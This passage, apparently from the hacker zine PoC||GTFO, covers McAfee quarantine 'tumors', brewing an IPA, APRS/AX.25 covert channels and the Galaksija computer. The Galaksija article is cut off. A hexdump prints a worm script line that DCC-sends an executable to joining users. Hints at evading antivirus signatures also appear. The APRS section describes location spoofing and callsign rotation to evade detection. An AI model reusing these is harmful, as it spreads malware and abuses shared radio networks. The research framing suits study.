[hexdump continued; the ASCII column shows the quarantined Alba script text, e.g. "n1:JOIN:#: if ( $me != $nick ) { /dcc send $nick c:\mirc\download\alba.exe }", followed by its XOR-encoded copy]

This tumor is benign, as its growth eventually
stops after a few rounds, and I've not yet been able
to compose a proof of concept of a malignant tumor,
one that eventually fills the hard disk. Through ex-
perimentation, I suspect that McAfee signatures are
more complex than string matches. For example,
when McAfee pulls out of my pool a file that previ-
ously had no nulls but now does, it often no longer
sees it as malware and rejoices. This is a problem
as 7zip introduces nulls in its metadata. Also some
malicious data no longer triggers the antivirus when
pushed deeper into the file. These barriers may be
bypassed by more intimate knowledge of the McAfee
signatures. 
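The 'X2' walkthrough and the script above both rest on one property of the quarantine format: XOR with a single byte is its own inverse, so a file made of a signature followed by its XOR image still contains the signature after quarantine. The following added C example (written for this page, not the author's script) does the construction for an arbitrary signature, checks that property with a plain byte search standing in for the scanner, and also runs the operation the other way, which is what an analyst does to recover a sample from the XOR-encoded file inside a .bup. The last helper follows from the author's observation about NUL bytes: every 'j' (0x6a) in a signature turns into 0x00 in the tumor's second half. All sample inputs are constructed.

```c
#include <stdio.h>
#include <string.h>

#define BUP_XOR_KEY 0x6a   /* the one-byte key VirusScan applies to the files inside a .bup */

/* XOR a buffer in place with the .bup key. The operation is its own inverse,
 * so one function both "encodes" a sample into quarantine form and decodes a
 * quarantined file back to its original bytes. */
void bup_xor(unsigned char *buf, size_t n) {
    for (size_t i = 0; i < n; i++)
        buf[i] ^= BUP_XOR_KEY;
}

/* Plain byte-string search standing in for a signature match. Unlike strstr
 * it copes with NUL bytes in either input. */
static int contains(const unsigned char *hay, size_t n, const unsigned char *sig, size_t m) {
    if (m == 0 || m > n) return 0;
    for (size_t i = 0; i + m <= n; i++)
        if (memcmp(hay + i, sig, m) == 0) return 1;
    return 0;
}

/* Build the tumor for a signature: sig followed by sig XOR key (the 'X2'
 * construction above). `out` needs 2*m bytes. Returns the tumor length. */
size_t make_tumor(const unsigned char *sig, size_t m, unsigned char *out) {
    memcpy(out, sig, m);
    memcpy(out + m, sig, m);
    bup_xor(out + m, m);
    return 2 * m;
}

/* The property the article relies on: after quarantine encoding the file
 * still contains the signature, so it is detected again. Returns 1 if the
 * encoded tumor still matches. */
int tumor_survives_quarantine(const unsigned char *sig, size_t m) {
    unsigned char tumor[512];
    if (m == 0 || 2 * m > sizeof tumor) return 0;
    size_t n = make_tumor(sig, m, tumor);
    bup_xor(tumor, n);                 /* what VirusScan does when quarantining */
    return contains(tumor, n, sig, m);
}

/* Forensic direction: recover a quarantined sample's bytes from the
 * XOR-encoded payload extracted from the .bup archive. */
size_t bup_decode_copy(const unsigned char *encoded, size_t n, unsigned char *out) {
    memcpy(out, encoded, n);
    bup_xor(out, n);
    return n;
}

/* Follows from the author's NUL observation: each 'j' (0x6a) in the signature
 * becomes 0x00 in the XORed half. Returns how many such bytes the tumor has. */
size_t tumor_nul_count(const unsigned char *sig, size_t m) {
    size_t c = 0;
    for (size_t i = 0; i < m; i++)
        if (sig[i] == BUP_XOR_KEY) c++;
    return c;
}

int main(void) {
    const unsigned char sig[] = "X";          /* constructed: the article's toy signature */
    unsigned char tumor[8];
    size_t n = make_tumor(sig, 1, tumor);
    printf("tumor: %.*s\n", (int)n, tumor);                    /* X2 */
    bup_xor(tumor, n);
    printf("after quarantine XOR: %.*s\n", (int)n, tumor);     /* 2X */
    printf("still matches 'X': %d\n", tumor_survives_quarantine(sig, 1));
    return 0;
}
```

`bup_decode_copy` is the part worth keeping around: extracting the two members of a .bup with 7zip and XORing them with 0x6a yields the original sample and its metadata for analysis without having to restore the file from quarantine.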










8 Brewing TCP/IPA; or, 


A Useful Skill for the Zombie Apocalypse 


Hacking is a broad term that has too many nega- 
tive and positive connotations to list. But whichever 
connotations you prefer, it is a skillset, and a skill is 
all about things or services that can be exchanged 
for currency or bartered for goods. While this fine 
journal excels in sharing scattered bits of useful 
hacking knowledge, the vast majority of publica- 
tions repeat ad nauseam the same drivel of the cy- 
ber world. But when the zombies come—and they 
will come!—what good are your SQL injections for 
survival? How will you exchange malware for fresh 
vegetables and clean drinking water? What practi- 
cal skills do you have that can enable your survival? 

What hacking shares with making is their com- 
mon ground of curiosity, skill, and patience—and 
these intersect on a product that is universally rec-
ognized, suitable for barter, and damn tasty. Of 
course, beer as we know it today differs from the an- 
cient times, where it was a part of the daily diet of 
Egyptian Pharaohs and Greek Philosophers through 
the ages. Today's beer and its varieties have ac- 
quired a broader tradition, each with a unique back- 
ground and tastes. But in that variety there is 
a center, one that pulls together people from all 
races, cultures, and economic statuses. Modern day 
philosophers and preachers discuss the world's chal- 
lenges over beer. Business deals and other relation- 
ships are solidified at the bar, by liquid camaraderie! 

Why do I bloviate on all of this? Because there 
comes a time in every hacker's life when you wish 
for more, when you wish to create something of in- 
trinsic value rather than endlessly find faults in the 
works of others. For me, that was turning grain, 
water, hops, and yeast into something greater than 
the sum of its parts. It's an avenue to share, to serve 
others, to create. 





(It's also something to trade for milk and bread 
when the zombies come!) 


8.1 Ingredients 


Beer, like most things in life, can be as simple or as 
complex as the reader wishes it to be. But at its 
core, this beverage started with four primary ingre- 
dients, each just as important as the next: grain, 
water, hops, and yeast. 
Grain  Or, more generally, any cereal whose grain 
can be cultivated and from which sugars can finally 
be extracted. But more than just simple grain: grain 
that has undergone the malting process. Grains are 
made to germinate by soaking in water, and are then 
halted from germinating further by drying with hot 
air, as shown in Figure 1. Malting develops the en- 
zymes that are required for modifying the grains' 
starches into sugars. This is important to know, as 
not just any grain will do for the beer brewing pro- 
cess. The sugars extracted from the malted grains 
will eventually be turned to alcohol during fermen- 
tation, as in Figure 2. 


Water  Arguably the most critical component, wa- 
ter makes up 95% of the final product and can con- 
tribute as much to the taste and feel of the brew 
as do the grains, hops, and yeast. Books have been 
written and rewritten on the subject of brewing wa- 
ter and will not be rehashed here. The key water 
properties are: clean, chlorine free, and plentiful. 


Hops Starting in the 9th century, brewers began 
using hops in place of bittering herbs and flowers as 
a way to flavor and stabilize their brew. Hops are the 
female flowers of the hop plant with training bines 
that set forth like ivy or grapes. The hop cone itself 
is made of multiple components, but most important 
to brewing are the resins that are composed of al- 
pha and beta acids. Alpha acids in particular are 
critical due to their mild antibiotic/bacteriostatic 
effect that favors the exclusive activity of brewing 
yeast over microbial nasties swimming about. See 
Figure 3. 
Beta acids contribute to the beer's aroma and 
overall flavor. These acids are extracted during the 
brewing process via boiling, which will be expanded 
upon in the following sections. 


²⁰ git clone https://github.com/BinaryBrewWorks/Beer/ 
   unzip pocorgtfo09.pdf beer.zip 
Yeast  Single-celled organisms with an amazing 
ability to convert carbohydrates (sugars) into CO₂ 
and alcohol, yeast is the literal lifeblood of beer, 
as fermentation changes sugary and otherwise bor- 
ing sugar water (wort, or young beer) into glorious 
brew. 

For brewing there are 2 main types of yeasts: 
“top-cropping” where the yeast forms a foam at 
the top of the wort during fermentation and is 
more commonly known as “ale yeast” and “bottom- 
cropping” where the yeasts ferment at lower temper- 
atures and settle at the bottom of the vessel during 
fermentation, commonly known as “lager yeast.” 





Yeast can be cultivated from the wild or 
known/safe sources. Yeast can even be collected and 
nurtured from bottle-conditioned brews (Belgian va- 
rieties in particular). 


8.2 Brewing Process 


The brewing process is often 15 minutes of frantic 
activity followed by 60 minutes of drinking, cleaning, 
or otherwise conversing with your neighbor. Sim- 
plistically, the steps are: extract fermentable sugars 
from the malted grains with hot water (mashing); 
boil and reduce the fermentable sugar water (wort) 
while adding hops at specific timing intervals; re- 
duce the wort to a safe temperature and move to a 
fermentation vessel; pitch yeast and store at a con- 
sistent temperature, allowing the fermentation pro- 
cess to occur; pack and condition the beer for future 
consumption and enjoyment. 





There is much science and wizardry that takes 
place in these five steps. I would like to take you 
through this process with one of our own recipes at 
Binary Brew Works. These days you can't have a 
brewery without an India Pale Ale (IPA), a beer that 
at its origin was heavily hopped to make the journey 
by ship from England to India. This heavy-handed 
hop addition creates a highly bitter, but hopefully 
aromatic and balanced brew that is popular today. 





Gathering the Ingredients For our IPA, appro- 
priately named TCP/IPa, the following ingredients 
are used and scaled for a 30 gallon (114 liter) batch. 
Scaling at this volume is 1:1; so halving the num- 
bers for a 15 gallon (57 liter) batch will yield similar 
results.²⁰ 


TCP/IPa 

FERMENTABLES: 
  2-Row 
  Caramel Malt 60L 
  Flaked Wheat 

HOPS: 
  Cascade 
  Citra 

YEAST: 
  Wyeast 1056 


Preparing the Mash Water In a brewing ket- 
tle of your choosing, bring the appropriate amount 
of water to what is known as strike temperature. 
The volume of water needed depends on other pa- 
rameters such as grain absorption rates, equipment 
losses, and evaporation. As such, using a brewing 
water calculator is recommended. For this recipe, 
approximately 45 gallons (170 liters) of strike water 
is needed to get the desired 30 gallons (114 liters) 
of finished product. Your striking temperature is 
typically 10-15°F (5-7°C) higher than your target 
mash temperature. (In this case, 170°F (77°C) for 
a target 160°F (71°C).) 


Mashing In a separate vessel called a mash tun, 
the prepared grains are waiting for inclusion of the 
strike water. The mash tun is often a modified cooler 
or other insulated vessel that can contain the volume 
of both the grain and the striking water. In single in- 
fusion mashing, water is added to the grains, stirred, 
and typically left to sit for 60 minutes to allow for 
the extraction of fermentable sugars. 15 minutes 
of frantic moving of water, stirring, and cleaning is 
then followed by 60 minutes of drinking your last 
batch of beer. 





Boiling Once the mashing is complete, the sugar 
water or “wort” has to be extracted and placed into 
the boiling kettle (oftentimes the same kettle used 
to heat the strike water). This can be accomplished 
in a number of ways, mostly through the use of mesh 
false bottoms or other straining mechanisms to pre- 
vent, as much as possible, solid grain matter from 
entering the boiling kettle. 
Once extracted, the wort is brought to a boil and 
held there for 60-90 minutes. The addition of hops 
through the boiling process adds to the bitterness 
and flavor of the beer, so it is critical to follow hop 
addition timings as this has a huge effect on the fi- 
nal product. For TCP/IPa, two hop additions are 
used. Cascade hops are widely used in the industry 
and therefore readily available to the brewer. Cas- 
cade hops provide the bittering required for an IPA 
while imparting the characteristic spicy and citrus 
flavor expected for the style. Citra hops are added 
towards the end of the boil to add the strong citrus 
and tropical tones of flavor and aroma. Remember, 
the earlier the hop addition, the more bittering oils 
are extracted from the hop. Later additions provide 
more flavor and aroma without adding bitterness. 
Cooling You now have a boiling pot of wort that 
must be cooled down to pitching temperature as 
quickly as possible. This is the most critical stage of 
the process! At 212°F (100°C), all types of nasties 
that can ruin your beer are boiled away. But as the 
wort is cooled, there is an increased risk of bacteria 
or other infections. Cleanliness of the brewery and 
its equipment is key from this point forward. 
Cooling can be accomplished by a number of 
heat transfer methods. At smaller volumes, coiled 


copper tubes shown in Figure 4 are submerged into 
the boiling wort to sanitize, and the cold water is 
passed through, cooling the wort to the target tem- 
perature. At larger volumes, heat transfer equip- 
ment gets bigger and beefier, but serves the same 
purpose. Most ale yeast pitches at a temperature 
between 70 and 75 degrees Fahrenheit (22°C). 


Fermentation Yeast are beautiful little crea- 
tures. Through a metabolic process, yeast convert 
sugars into gas (CO₂) and alcohol. This process 
must take place in a sanitary vessel where no in- 
terference from other microbes can ruin our wort. 
Temperature control of the vessel and the surround- 
ing room is critical to the overall taste and feel of the 
final product. Some styles, such as the saison, are 
purposefully fermented at the highest temperatures 
(80-85°F, 27-29°C) allowed by the yeast. Fermen- 
tation at this temperature produces a “spicy” profile. 

For lagers, yeast ferment at lower temperatures 
common to basements and cellars and produce a 
funky flavor. Not my preference, but fun nonethe- 
less if you have the equipment or climate to ferment 
at this temperature. 

And like magic, our sugary wort is churned, 
eaten, and converted into glorious beer. 








Packaging Once the fermentation process is 
nearly complete, the beer can be stored and chilled. 
Carbonation comes next, with various methods 
available to the home brewer. Bottle conditioning 
is the process of introducing a priming sugar back 
into the wort just prior to bottling. Take careful 


notes and measurements at this point, as too much 
sugar can create explosive “bottle bombs.” 

Investing in a used kegging system can help 
tremendously. Not only does this simplify cleaning, 
it also allows the brewer to force carbonate the keg. 
Attaching a CO₂ tank and selecting the appropri- 
ate PSI level can quickly and more evenly carbonate 
your brew to the target levels. Plus there's nothing 
like having fresh, cold beer on tap. 





Creating a final product from raw ingredients is 
a very fulfilling process. The basic process of ex- 
tracting sugars from grain, adding hops, fermenta- 
tion, and drinking is just the surface of a complex, 
diverse, and creative industry. For the homebrewer, 
it not only serves as a way to make and enjoy beer, but 
also as a social tradition where drinks and conversa- 
tions are had over a boiling pot of wort. Go forth, 
become a brewer, and enjoy the miracle of your own 
beer! 
9 Shenanigans with APRS and AX.25 for Covert Communications 


by Vogelfrei 


This little document details some shenanigans involving APRS and its underlying AX.25 protocol, in- 
cluding but not limited to covert channels, steganography, avoiding detection by normal users and leveraging 
Internet infrastructure for worldwide covert communication. 

Covert channels in radio packet protocols have been investigated in the past.²¹ Although the regulations 
for amateur radio operation explicitly forbid hiding, encoding, or encrypting communications in any form, 
it is nonetheless a challenging and fruitful field for experimentation. 

I had been researching the topic for a while, and informally mentioned this to my neighbors Travis 
and Muur, who—it turned out—had been working on PSK31. They requested an article to follow theirs, 
PoC||GTFO 8:4. So enjoy this short piece, and look out for more elaborate tricks and tools for all your 
booklegging communication needs, because the world is almost through!²² 

The APRS protocol (Automatic Position Reporting System), originally developed by Bob Bruninga 
(WB4APR), has its roots in the necessity to track the position and telemetry data of vehicles, weather 
stations, and hikers. 

APRS is built on the AX.25 protocol, an amateur variant of the commercial X.25 protocol you'll fondly 
remember from Phrack 45:8. Despite the amateur nature of its deployment, there is an impressively large 
infrastructure of Internet gateways, digipeaters, weather stations, and other kinds of nodes. The International 
Space Station (ISS) itself has an APRS-capable digipeater on-board, and radio operators across the globe 
engage in packet radio messaging through the station and other satellites. 

Perhaps the most interesting feature of APRS, besides the fact that it supports exchanging all kinds 
of information, is the way the data is routed between uncoordinated nodes over large areas. It is this 
decentralized, connection-less nature that makes APRS ideal for covert communication purposes. 





9.0.1 Frequencies and Equipment 


Now that you have a general idea of what APRS is and what it might be useful for, you should know which 
frequencies are designated for APRS transmissions. Frequencies vary by country, but as a general rule, North 
America uses 144.390 MHz while Europe and Africa use 144.800 MHz. 

For testing and experimentation purposes, start with a cheap hand-held radio such as the Baofeng UV5R 
from China. It is capable of transmitting in the 2m and 70cm bands, and can easily be connected to your 
computer's sound card. This will allow you to immediately test software modems and get your feet wet with 
APRS and other packet radio protocols. 

If you would like to get fancy, I recommend two additional pieces of equipment. Get a dual-band 
radio with TNC support, such as the Kenwood TM-D7xx or TH-D72A. The TNC will interpret packets in 
hardware, freeing you from DSP headaches. You will also want a general purpose wide-band receiver with 
discriminator (unadulterated audio) output; ordinary folks call this a scanner. 





9.1 The Protocol 


As mentioned before, APRS uses AX.25 for transport. More specifically, APRS data is contained in AX.25 
Unnumbered Information (UI) frames, in the information field. The protocol is completely connectionless; 
there is neither state nor any expectation of a response for a given packet.²³ This is rather handy for simple 
systems, since you will only need a single packet consumer, and the rest of your state machine is entirely up 
to you. Because of its simplicity, APRS can be easily implemented in microcontrollers. 

A simple APRS message packet looks as follows: 





²¹ jt65stego by Drapeau (KA1OVM) and Dukes, 2014 

²² So says the preacher man but... I don't go by what he says. 

²³ This is the exact opposite of your Wi-Fi, where every data frame is acknowledged, and no more data is sent unless either 
the ACK arrives or a timeout is reached. 
Figure 6: APRS Data contained in the AX.25 information field (256 bytes: APRS Data, APRS Data Extension, Comment) 


NOCALL-9>N1CALL-9,WIDE1-1,WIDE2-2::N1CALL-9 :This is a test for APRS messages{1 


Dissecting its structure, we will find: 


1. The path element: NOCALL-9>N1CALL-9,WIDE1-1,WIDE2-2 
2. A colon (:) delimiting the end of the path and the beginning of the packet data. 


3. The packet type identified by a single character, : for messages. 





4. After that, whatever format the packet type specifies. In the case of a message, a colon-delimited 
recipient callsign, followed by the text and a { bracket followed by a number, indicating the line of the 
message, starting at one. 


The comment field is also susceptible to abuse, limited to printable ASCII data as the specification 
demands: “The comment may contain any printable ASCII characters (except | and ~, which are reserved 
for TNC channel switching).” Depending on the DTI, the Comment field is used to include additional 
information besides what is sent in the Data field, mostly for telemetry uses. Coordinates are encoded using 
Base-91. 

The wealth of information provided in the original protocol specification should be more than enough to 
figure out ways to conceal your own data in different packet types. Of particular interest are the mechanisms 
for compressed coordinates and telemetry, weather reports, and bulletin messages. While these have size 
limitations, leveraging the unused DTIs as described in the next section allows for crafty ways to chain 
multiple packets together. 








9.2 Abusing Unused Data Type Identifiers (DTI) 


The APRS protocol defines multiple DTIs as unused or forbidden. These are often ignored by software and 
TNCs in actual radios, making them an ideal target for creative reuse. Because it would be trivial to detect 
and actively monitor for intentional use of the unused DTIs, a better approach is to leverage them in a way 
that provides somewhat plausible deniability. 








1. Prepare APRS Data contents for a given DTI. 

2. Find the nearest unused DTI, possibly identifying the unused DTIs that require the least amount of bits 
to corrupt so that the DTI isn't “too far” from the one corresponding to the data we have prepared. 

3. Proceed to send the packet containing an invalid DTI that is unused yet contains seemingly valid data 
for an adjacent DTI. 


Table 1: Unused and reserved DTIs next to valid ones 

Unused/reserved DTI               Valid DTI neighboring? 
0x22  Unused                      0x21 (position without timestamp) and 0x23 (WX) 
0x26  Reserved (“map feature”)    0x25 (MicroFinder) and 0x27 
0x28  Unused                      0x27 and 0x29 (Item) 
0x2e  Reserved (Space weather)    0x2f (position with timestamp sans messaging) 
0x30-0x39  Unused                 0x3a (Message) 


Figure 7: AX.25 Unnumbered Information (UI) frame structure 


Unused DTIs that are one position away from another include 0x21 and 0x22 (position without timestamp 
versus unused). Table 1 contains some of the interesting unused identifiers up for grabs; please refer to the 
APRS Protocol Reference²⁴ for the rest of them. DTIs involved in TNC operation should be avoided, unless 
the TNC behavior can be abused constructively. 

The benefit of hiding data in an otherwise valid APRS Data segment with an incorrect (unused) DTI is 
that clients—including built-in TNCs—will ignore the packet and not attempt to decode its contents. 
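The packet dissection in Section 9.1 and the DTI table above describe what a monitoring station has to parse; the following Python is an added example written for this edit, not code from the article, from aprsc or from any APRS project. It splits the TNC2-style text packet shown on this page, decodes the message format, and flags the unused DTIs of Table 1, the user-defined and third-party DTIs, and TCPIP/RFONLY path entries; the sample packets are constructed (the first is the page's own example).

```python
"""Parser and monitoring check for APRS packets in the TNC2 text form used on
this page ("SRC>DEST,PATH:info").  Added example for this edit, not code
from the article, from aprsc or from any APRS project; the sample packets
below are constructed (the first is the page's own example)."""
import re
from dataclasses import dataclass

# Table 1 on this page: unused/reserved DTIs a monitoring station should flag.
UNUSED_DTIS = {0x22: "unused", 0x26: "reserved (map feature)", 0x28: "unused",
               0x2E: "reserved (space weather)"}
UNUSED_DTIS.update({b: "unused" for b in range(0x30, 0x3A)})   # 0x30-0x39

# Valid DTIs named on this page (neighbours an abused DTI may imitate), plus
# the user-defined and third-party DTIs from the aprsc excerpt.
VALID_DTIS = {0x21: "position without timestamp", 0x23: "weather report",
              0x25: "MicroFinder", 0x27: "old Mic-E / Item", 0x29: "Item",
              0x2F: "position with timestamp, no messaging", 0x3A: "message",
              0x7B: "user-defined", 0x7D: "third-party"}

# Message body: 9-character addressee, ':', text, optional '{' + message number.
MESSAGE_RE = re.compile(r"^(?P<addr>.{9}):(?P<text>[^{]*)(?:\{(?P<msgno>[^}]{1,5}))?$")


@dataclass
class APRSPacket:
    source: str
    destination: str
    path: list      # digipeater path; a trailing '*' marks a hop already used
    dti: str        # first byte of the AX.25 information field
    body: str       # everything after the DTI


def parse_tnc2(line: str) -> APRSPacket:
    """Split 'SRC>DEST,PATH:info'; the first ':' ends the path element."""
    header, sep, info = line.partition(":")
    if not sep or not info:
        raise ValueError("no information field")
    source, gt, rest = header.partition(">")
    if not gt or not source or not rest:
        raise ValueError("malformed path element")
    dest, *path = rest.split(",")
    return APRSPacket(source, dest, path, info[0], info[1:])


def parse_message(pkt: APRSPacket):
    """Return (addressee, text, msgno) for a ':' packet, else None."""
    if pkt.dti != ":":
        return None
    m = MESSAGE_RE.match(pkt.body)
    if not m:
        return None
    return m.group("addr").strip(), m.group("text"), m.group("msgno")


def classify(pkt: APRSPacket) -> list:
    """Findings a monitoring station would log for this packet."""
    findings = []
    code = ord(pkt.dti)
    if code in UNUSED_DTIS:
        near = [f"0x{n:02x} ({VALID_DTIS[n]})"
                for n in (code - 1, code + 1) if n in VALID_DTIS]
        findings.append(f"unused DTI 0x{code:02x} ({UNUSED_DTIS[code]}); "
                        f"payload may imitate {', '.join(near) or 'no named neighbour'}")
    if pkt.dti == "{":
        findings.append("user-defined packet: APRS-IS software such as aprsc drops it")
    if pkt.dti == "}":
        findings.append("third-party packet: the inner packet needs its own parse")
    hops = {h.rstrip("*") for h in pkt.path}
    if "TCPIP" in hops:
        findings.append("path contains TCPIP: will not be gated to RF")
    if "RFONLY" in hops:
        findings.append("path contains RFONLY: will not reach APRS-IS")
    return findings


# Constructed samples: the page's message packet, then two crafted cases.
SAMPLES = [
    "NOCALL-9>N1CALL-9,WIDE1-1,WIDE2-2::N1CALL-9 :This is a test for APRS messages{1",
    'NOCALL-9>APRS,TCPIP*:"4903.50N/07201.75W-looks like a position report',
    "NOCALL-9>APRS,RFONLY:{XYconstructed user-defined payload",
]


def scan(lines) -> dict:
    """Map each packet line to its findings; an empty list means nothing unusual."""
    return {line: classify(parse_tnc2(line)) for line in lines}


if __name__ == "__main__":
    for line, findings in scan(SAMPLES).items():
        print(line)
        for f in findings or ["nothing unusual"]:
            print("   ", f)
```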


9.2.1 Third-party and User Defined Packets 


Two special DTIs exist that allow for packet-in-packet protocol tricks: the third-party and user-defined 
packets. These have special quirks associated with them, and the way TNCs handle them is not standardized. 
This is both a good and a bad thing. For instance, the Kenwood 'TM-D7xx’s built-in TNC will ignore third- 
party packets entirely if it cannot parse them. 


²⁴ unzip pocorgtfo09.pdf aprs101.pdf 
However, Internet Gateways will also ignore all user-defined packets and impose additional restrictions 
on the third-party DTI. This is the biggest motivator for actually reading the source code of APRS Internet 
gateway software. For example, from aprsc: 


    static int parse_aprs_body(struct pbuf_t *pb, const char *info_start) 
    { 
        /* ... switch on the DTI byte ... */ 

        case '{': 
            pb->packettype |= T_USERDEF; 
            return 0; 

        case '}': 
            pb->packettype |= T_3RDPARTY; 
            return parse_aprs_3rdparty(pb, info_start); 

        /* ... */ 


9.3 Internet Gateways 


Gateways between the Internet and APRS radios are known as Internet Gateways or iGates. Typically iGates 
are used to forward APRS beacons heard over radio to some website, but there are a lot more interesting 
things we could do with them. 


9.3.1 Tricks with iGates 


Some iGates support transmitting data from the Internet out to radio, effectively bridging the local RF 
spectrum to the APRS-IS network. 

There is no official way to list iGates, so our best bet is connecting to the backbone servers they report 
to, passively listening for frames and beacons that announce their presence. We would also like to distinguish 
iGates that are capable of transmitting from those that only receive. When we find some such iGates, they 
allow us to perform some gnarly tricks! 

We can send an APRS message from an Internet-only host in Asia to an individual driving in Pittsburgh 
with only a radio receiver and a TNC. Hide locations of control sites by first proxying your packets through 
the Internet iGates, only to target your local RF nodes through a separate, sacrificial iGate bridge. 

The system is only limited by APRS-IS rules in terms of traffic congestion control. Because all RF nodes 
receive from and transmit to the same frequency, overlapping transmissions can and will reduce the ratio of 
successfully decoded packets for everyone else. Therefore, be neighborly! 





Traffic caps are enforced by the iGate operator's configuration. Commonly a given node, as identified 
by its callsign and SSID, will only be able to use the Internet-RF bridge for transmitting a fixed number of 
packets each minute. This is to prevent accidental jamming of the RF channel. 


9.3.2 Packet Validation and RF Digipeating 


Some architectural limitations of APRS need to be considered carefully. First, most iGates in the APRS-IS 
network will only digipeat packets to the RF side if the station is located within a fixed radius of so many 
kilometers. Second, we might not get to know if a given area has an iGate capable of bridging RF, or 
transmitting to RF. We can't simply wait for a response, as APRS is a response-less protocol. Third, packets 
marked RFONLY in their path won't reach APRS-IS. Packets marked TCPIP won't reach RF nodes. iGates 
forcing or restricting either will be dead-ends if we aim to bridge over APRS-IS. Finally, user-defined packets 
are ignored by most of the APRS-IS infrastructure. For example, aprsc ignores them. Third-party packets 
are allowed, with caveats. 
9.3.3 Bypassing Validation 





There are a few ways to bypass the restrictions imposed on bridging RF in iGates that require geographical 
proximity. 

You can try to spoof your location by sending a beacon positioned at fake coordinates near the iGate. 
You can then send your actual data packets, remembering to regularly send a position beacon to the iGate 
to remain in the last-heard list. 

You could limit use of user-defined packets to the RF side, operating a rogue iGate that does not ignore 
them, instead transforming them to third-party or steganographic standard packets, delivered to APRS-IS. 
User-defined packets are not displayed by most equipment. This also applies to unused or obscure DTIs. 

To avoid potential roadblocks, the following considerations may help. If trying to reach the RF side, 
do not use (and verify that the iGate/ APRS-IS nodes don't use) TCPIP in the path. If trying to reach the 
Internet side, do not use RFONLY in the path. To avoid packet drops from rate limiting, throttle your packets, 
sending one every one to five minutes. 

Albeit completely illegal on the actual air, as an experiment in a controlled environment, automatically 
generated callsigns can be rotated to avoid being detected or banned from the system.²⁵ Finally, client 
version strings, as used during registration with APRS-IS nodes, could be rotated and mimic real clients. 

Looking up standard TCP/IP “pivoting” techniques may help for accessing the APRS-IS network, but 
first and foremost, remember to be neighborly. 


9.3.4 International Space Station (ISS) and APRS 


Space, the final frontier! It suffices to say that a digipeater installed onboard the ISS makes APRS into the 
tool of choice for legal ruckus communications on a worldwide scale. So as long as the TNC of the ISS’ radio 
validates your packets, you can deliver your covert messages in a fully decentralized fashion!²⁶ 

Whether commercial TNCs out there relay packets with unused DTIs is a question left to the reader as 
an exercise. 


9.4 Parting words: legal status of subterfuge in radio communications 


Amateur radio laws generally prohibit steganography and also encryption, with a few narrow exceptions.²⁷ 


For example, the US Electronic Code of Federal Regulations §97.309 states, “RTTY and data emissions using 
unspecified digital codes must not be transmitted for the purpose of obscuring the meaning of 
any communication.”²⁸ ²⁹ Governments do monitor the airwaves where they care about them the most, 
and having your antennas, expensive equipment, or house ransacked sucks. Also keep in mind that amateur 
radio is self-policing; if you mess up and create a nuisance that affects everyone else, your future experiences 
with that small, tight-knit, but global community may be seriously soured. So be neighborly, have fun, and 
stay safe! 





— Vogelfrei 


²⁵ Don't do this. Acting like an asshole on the radio is the surest way to convince a brilliant RF engineer to spend his 
retirement hunting you down. 

²⁶ In Heinlein's “Between the Planets”, 1951, the same celestial path of the Circum-Terra station is used for a much less benign 
purpose: worldwide delivery of nukes. That book also introduced the idea of a stealth technology vehicle with a radar-reflecting 
surface, before any scientific publications on the subject. Welcome to classic 1950s Sci-Fi. —PML 

²⁷ unzip pocorgtfo09.pdf encham.html # Encryption and Amateur Radio by KD0LIX 

²⁸ unzip pocorgtfo09.pdf part97.pdf 

²⁹ Also note §97.217: Telemetry transmitted by an amateur station on or within 50 km of the Earth's surface is not considered 
to be codes or ciphers intended to obscure the meaning of communications. 
You have to SEE it to BELIEVE it! 


The Alpha Microsystems AM-100 is LIGHT 
YEARS ahead of everything else you've 
seen so far in the low cost computing field. 


For a FRACTION of what you'd normally 
pay for the SOFTWARE ALONE, you get a 
16-bit processor with ALL of these BIG- 
SYSTEM capabilities: 


* MULTI-TASKING, MULTI-USER TIMESHARING 

* DEVICE INDEPENDENT I/O 

* ADVANCED FILE STRUCTURE 

* POWERFUL SYSTEM COMMANDS 

* SOPHISTICATED TEXT EDITOR 

* FULL MACRO ASSEMBLER 

* LINE PRINTER SPOOLER 

* RE-ENTRANT, MULTI-USER BASIC COMPILER 

* LARGE UTILITIES LIBRARY 

Yet, with all this it's still compatible 
with the S-100 BUS! 


If you like the Decsystem-10 operating 
system, if you like TECO ... if you like the 
PDP-11 instruction set... you'll LOVE the 
AM-100! 
10 Build Your Own “Galaksija” Computer 


Voja Antonić 


This article on the Galaksija computer first appeared in the January 1984 special edition of Dejan Ris- 
tanović's Yugoslavian science magazine, also called Galaksija. We reprint it as a salute to fine neighbors such 
as Mr. Antonić, to all those who build strange and lovely contraptions in their basement laboratories and 
then share them with the world. —PML 


10.1 Building the “Galaksija” Computer Yourself, 
in Comic-Strip Form 

Here we are, finally, at the practical part of the 
job. Serious but pleasant work awaits us, and it will 
be rewarded with the uncommon satisfaction of 
having created and brought to life such an intelli- 
gent device. Do not be discouraged if you feel you 
lack experience: that is the first and a good sign 
that you have a self-critical spirit, and believe me, 
in this work that is more necessary than experience. 
Pause after every detail, even the smallest and 
seemingly insignificant one, and judge whether it 
was done well, and the “Galaksija” will work on the 
first try! 


10.1.1 Important Decisions 


Before starting work, several important decisions 
must be made. First, whether we want this system 
to be final, or whether we will leave open the pos- 
sibility of expanding it in the future by adding a 
printer, more memory, a programmer, a “music 
box”, and the like. If we do not want these expan- 
sions, we have saved a multi-pin connector and one 
integrated circuit (the 74LS32, which we will re- 
place with a jumper marked with dashes on the as- 
sembly diagram). If you are in doubt, we advise 
you to install these two parts anyway, although it 
will not be too late for that later, either. 


The second question is whether we opt for an un- 
modulated video signal or a modulated (RF) picture 
signal. An unmodulated video signal does not re- 
quire installing an RF modulator in the computer 
and gives a more stable, higher-quality picture, but 
it cannot be connected to just any television set: a 
special monitor or a black-and-white TV with an 
added monitor input is needed. That requires no 
additional expense, but it does require prior knowl- 
edge and experience in working with TV receivers. 
Furthermore, such a TV set must be transistorized 
(tube sets are out of the question) and must have 
a mains transformer (and not a so-called “hot chas- 
sis”); both of these conditions are most often met 
by small portable black-and-white TVs that have 
an external connection for a 12 V battery. Some 
advice on adding a monitor input to such a TV set 
will be given later in the text. But if we install an 
RF modulator, we are freed from all these problems 
and can connect to the antenna input of any tele- 
vision. 

Assembly diagram: Layout of components in the “Galaksija” computer 


We will also have to decide which chips to place 
in sockets and which to solder directly onto the 
printed circuit board. We advise only that you use 
sockets for the EPROMs (2716 and 2732); for the 
rest, decide for yourselves. The advantage of sock- 
ets is that they reduce the risk of ruining a chip, 
and that by swapping it is very easy to localize a 
faulty IC (if there is one at all, that is, if the fault 
is not with some other component), because desol- 
dering chips is an extremely delicate job. Sockets, 
unfortunately, unless they are of top quality, cause 
problems with bad contacts more often than any 
other component. To be reliable, a socket must be 
